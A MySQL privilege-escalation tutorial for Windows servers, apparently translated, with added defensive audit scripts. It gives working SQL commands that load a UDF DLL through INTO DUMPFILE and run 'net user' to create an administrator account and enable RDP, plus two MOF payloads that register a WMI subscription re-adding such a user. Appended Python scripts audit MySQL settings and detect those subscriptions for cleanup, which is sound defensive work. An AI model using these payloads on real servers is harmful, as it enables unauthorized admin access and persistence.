
MySQL privilege escalation

1. UDF privilege escalation using sqlmap's UDF library

  1. Find a writable directory and upload lib_mysqludf_sys.dll; depending on the MySQL version, import it into windows\system32 or into MySQL's \lib\plugin directory. The plugin directory can be located with:

select @@plugin_dir;

select load_file('C:\\RECYCLER\\lib_mysqludf_sys.dll') into dumpfile 'C:\\windows\\system32\\lib_mysqludf_sys.dll';

  2. Create the function and execute commands

create function cmd returns string soname 'lib_mysqludf_sys.dll';
select cmd('net user mrxt 123456 /add');
select cmd('net localgroup administrators mrxt /add');
select cmd('regedit /s C:\\3389.reg');
drop function cmd;
delete from mysql.func where name='cmd';

  3. In some cases you get "Can't open shared library"; the DLL then has to be exported into the lib\plugin directory before it works. If that directory does not exist, it can be created with the NTFS ADS stream trick:

select 'dll file' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\::$INDEX_ALLOCATION';  -- creates the lib directory
select 'dll file' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';  -- creates the plugin directory
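Every step in section 1 depends on three server-side conditions: an account with the FILE privilege, an empty secure_file_priv (so INTO DUMPFILE and LOAD_FILE can reach arbitrary paths), and a plugin directory the dump can land in. The audit below is an added example, not code from the original post or from sqlmap; it evaluates values an administrator would normally read from the server (SELECT @@secure_file_priv, @@plugin_dir; SHOW GRANTS FOR CURRENT_USER(); SELECT name, dl FROM mysql.func) and reports which of those conditions hold. The two snapshots at the bottom are constructed for this example, not taken from a real host.

```python
"""Audit the MySQL settings the UDF-via-DUMPFILE escalation relies on.

Added example, not from the original post. The Snapshot fields hold the
results of queries an administrator runs against the server; here they are
constructed inline so the script runs offline.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Library names shipped with sqlmap / lib_mysqludf_sys that expose sys_exec/sys_eval.
SYS_UDF_LIBS = {"lib_mysqludf_sys.dll", "lib_mysqludf_sys.so"}


@dataclass
class Snapshot:
    secure_file_priv: Optional[str]     # None or "" = no restriction, "NULL" = file I/O disabled
    plugin_dir: str
    grants: List[str]                   # rows of SHOW GRANTS for the application account
    udfs: List[Tuple[str, str]]         # (name, dl) rows of mysql.func


def _norm(path: str) -> str:
    """Case- and separator-insensitive comparison form for Windows paths."""
    return path.replace("/", "\\").rstrip("\\").lower()


def audit(snap: Snapshot) -> List[str]:
    """Return one finding per weakness; an empty list means none of these checks fired."""
    findings: List[str] = []
    sfp = (snap.secure_file_priv or "").strip()

    # 1. An empty secure_file_priv lets SELECT ... INTO DUMPFILE and LOAD_FILE()
    #    reach any path the MySQL service account can write or read.
    if sfp == "":
        findings.append("secure_file_priv is empty: INTO DUMPFILE/LOAD_FILE are unrestricted")
    # 2. Even with a directory set, it must not contain plugin_dir, or a library can be
    #    dropped exactly where CREATE FUNCTION ... SONAME will load it from.
    elif sfp.upper() != "NULL" and _norm(snap.plugin_dir).startswith(_norm(sfp)):
        findings.append(f"plugin_dir {snap.plugin_dir} lies inside secure_file_priv {sfp}")

    # 3. The FILE privilege (or ALL PRIVILEGES) is what makes the file writes possible.
    for grant in snap.grants:
        if re.search(r"\b(ALL PRIVILEGES|FILE)\b", grant, re.IGNORECASE):
            findings.append(f"account holds FILE-capable grant: {grant}")

    # 4. Any registered UDF backed by a command-execution library is a standing backdoor,
    #    whatever name it was registered under (the post registers it as 'cmd').
    for name, dl in snap.udfs:
        lib = dl.replace("/", "\\").split("\\")[-1].lower()
        if lib in SYS_UDF_LIBS or name.lower().startswith("sys_"):
            findings.append(f"UDF {name} loads {dl}: SQL-to-OS command execution")

    return findings


# Constructed snapshots (not real hosts): one as left behind by the steps above, one hardened.
WEAK = Snapshot(
    secure_file_priv="",
    plugin_dir="C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin",
    grants=["GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION"],
    udfs=[("cmd", "lib_mysqludf_sys.dll")],
)
HARDENED = Snapshot(
    secure_file_priv="NULL",
    plugin_dir="C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin",
    grants=["GRANT SELECT, INSERT, UPDATE ON app.* TO 'app'@'localhost'"],
    udfs=[],
)

if __name__ == "__main__":
    for label, snap in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(snap) or ["no findings"])
```

The fix for each finding is the inverse of the condition: set secure_file_priv to NULL (or to a directory that does not contain plugin_dir), take FILE away from application accounts, and drop any row in mysql.func whose library you did not install yourself. Because a library that has already been loaded stays mapped until the server restarts, a DROP FUNCTION alone is not the end of the cleanup.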


2. MOF privilege escalation

Find a writable directory and upload the MOF file, for example C:\RECYCLER\

This payload uses WScript.Shell:

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user mrxt 123456 /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};


This payload uses Shell.Users:

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"Shell.Users\")\nz=WSH.create(\"NewUser\")\nz.changePassword(\"123456\", \"\")\nz.setting(\"AccountType\")=3";
};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};


Then export it into the c:/windows/system32/wbem/mof/ directory:

select load_file('C:\\wmpub\\nullevt.mof') into dumpfile 'c:\\windows\\system32\\wbem\\mof\\nullevt.mof';


This method keeps adding the user over and over; run net stop winmgmt and then delete the file to stop it.
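What the MOF files in this section register is a WMI permanent event subscription: an __EventFilter that polls Win32_LocalTime, an ActiveScriptEventConsumer holding the script, and a __FilterToConsumerBinding that wires them together. Two points matter for cleanup: the automatic compilation of files dropped into wbem\mof exists only on Windows XP and Server 2003, and once a MOF has been compiled the three instances live in the WMI repository under root\subscription, so deleting the .mof file does not remove them; they have to be deleted from that namespace as well. The script below is an added example, not code from the original post: it parses the MOF syntax used above (instance of <class> [as $alias] { property = "..."; };), reports every subscription that would execute a script without user action, and lists the instances to delete. SAMPLE_MOF is constructed for this example with a placeholder command in place of the post's net.exe line.

```python
"""Find WMI permanent-event subscriptions inside a .mof file.

Added example, not from the original post. Parses the MOF instance syntax
used in the post and reports what the file would register; SAMPLE_MOF is a
constructed sample with a placeholder command.
"""
import re
from typing import Dict, List, Tuple

# Consumers that execute arbitrary script or command lines when their filter fires.
EXEC_CONSUMERS = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}
# COM objects and commands worth calling out when they appear in the payload.
SUSPICIOUS_SCRIPT = re.compile(
    r"WScript\.Shell|Shell\.Users|\bnet(?:\.exe)?\s+(?:user|localgroup)\b", re.IGNORECASE)

_INSTANCE = re.compile(r"instance\s+of\s+(\w+)(?:\s+as\s+\$(\w+))?\s*\{(.*?)\}\s*;", re.S)
_PROP = re.compile(r"(\w+)\s*=\s*((?:\"(?:[^\"\\]|\\.)*\"\s*)+|\$\w+|[^;]+);", re.S)
_LITERAL = re.compile(r"\"((?:[^\"\\]|\\.)*)\"")


def _unescape(lit: str) -> str:
    """Resolve the MOF string escapes \\\" \\\\ \\n inside one literal."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), lit)


def parse_mof(text: str) -> List[Tuple[str, str, Dict[str, str]]]:
    """Return (class, alias, properties) per instance; adjacent string literals are joined."""
    instances = []
    for m in _INSTANCE.finditer(text):
        cls, alias, body = m.groups()
        props: Dict[str, str] = {}
        for name, raw in _PROP.findall(body):
            raw = raw.strip()
            if raw.startswith('"'):
                props[name] = "".join(_unescape(p) for p in _LITERAL.findall(raw))
            else:
                props[name] = raw          # $alias reference or bare value
        instances.append((cls, alias or "", props))
    return instances


def inspect_mof(text: str) -> List[str]:
    """Describe every auto-executing subscription the MOF would register."""
    instances = parse_mof(text)
    by_alias = {alias: (cls, props) for cls, alias, props in instances if alias}
    findings: List[str] = []
    for cls, _alias, props in instances:
        if cls in EXEC_CONSUMERS:
            payload = props.get("ScriptText") or props.get("CommandLineTemplate") or ""
            findings.append(f"{cls} {props.get('Name', '?')} executes: {payload!r}")
            hit = SUSPICIOUS_SCRIPT.search(payload)
            if hit:
                findings.append(f"payload uses {hit.group(0)}")
        elif cls == "__FilterToConsumerBinding":
            _fcls, fprops = by_alias.get(props.get("Filter", "").lstrip("$"), ("", {}))
            _ccls, cprops = by_alias.get(props.get("Consumer", "").lstrip("$"), ("", {}))
            findings.append(f"binding {fprops.get('Name', '?')} -> {cprops.get('Name', '?')}: "
                            "consumer fires without user action")
            # A Win32_LocalTime filter is a timer: the consumer re-runs on every match,
            # which is why the post's user keeps being re-created.
            if "Win32_LocalTime" in fprops.get("Query", ""):
                findings.append("filter polls Win32_LocalTime: consumer re-runs on a timer")
    return findings


def removal_targets(text: str) -> List[Tuple[str, str]]:
    """(class, Name) pairs to delete from root\\subscription, bindings first.

    A binding has no Name of its own; it is identified by its Filter and Consumer."""
    instances = parse_mof(text)
    names = {alias: props.get("Name", "") for _c, alias, props in instances if alias}
    bindings, others = [], []
    for cls, _alias, props in instances:
        if cls == "__FilterToConsumerBinding":
            f = names.get(props.get("Filter", "").lstrip("$"), "?")
            c = names.get(props.get("Consumer", "").lstrip("$"), "?")
            bindings.append((cls, f"{f}->{c}"))
        elif cls in EXEC_CONSUMERS or cls == "__EventFilter":
            others.append((cls, props.get("Name", "")))
    return bindings + others


# Constructed sample: the post's structure with a placeholder command.
SAMPLE_MOF = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"cmd.exe /c echo PLACEHOLDER\")";
};
instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};
'''

if __name__ == "__main__":
    for line in inspect_mof(SAMPLE_MOF):
        print(line)
    print(removal_targets(SAMPLE_MOF))
```

The same parser runs over any .mof found in wbem\mof (and in the good and bad subfolders where the auto-compiler moves processed files), and the names it returns are the ones to look for in root\subscription on the live system, for instance with Get-WmiObject -Namespace root\subscription -Class __EventFilter (and ActiveScriptEventConsumer, __FilterToConsumerBinding) followed by Remove-WmiObject on each match.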


References:

http://www.waitalone.cn/mysql-tiquan-summary.html

http://zone.wooyun.org/content/1795

http://www.exploit-db.com/exploits/23083/
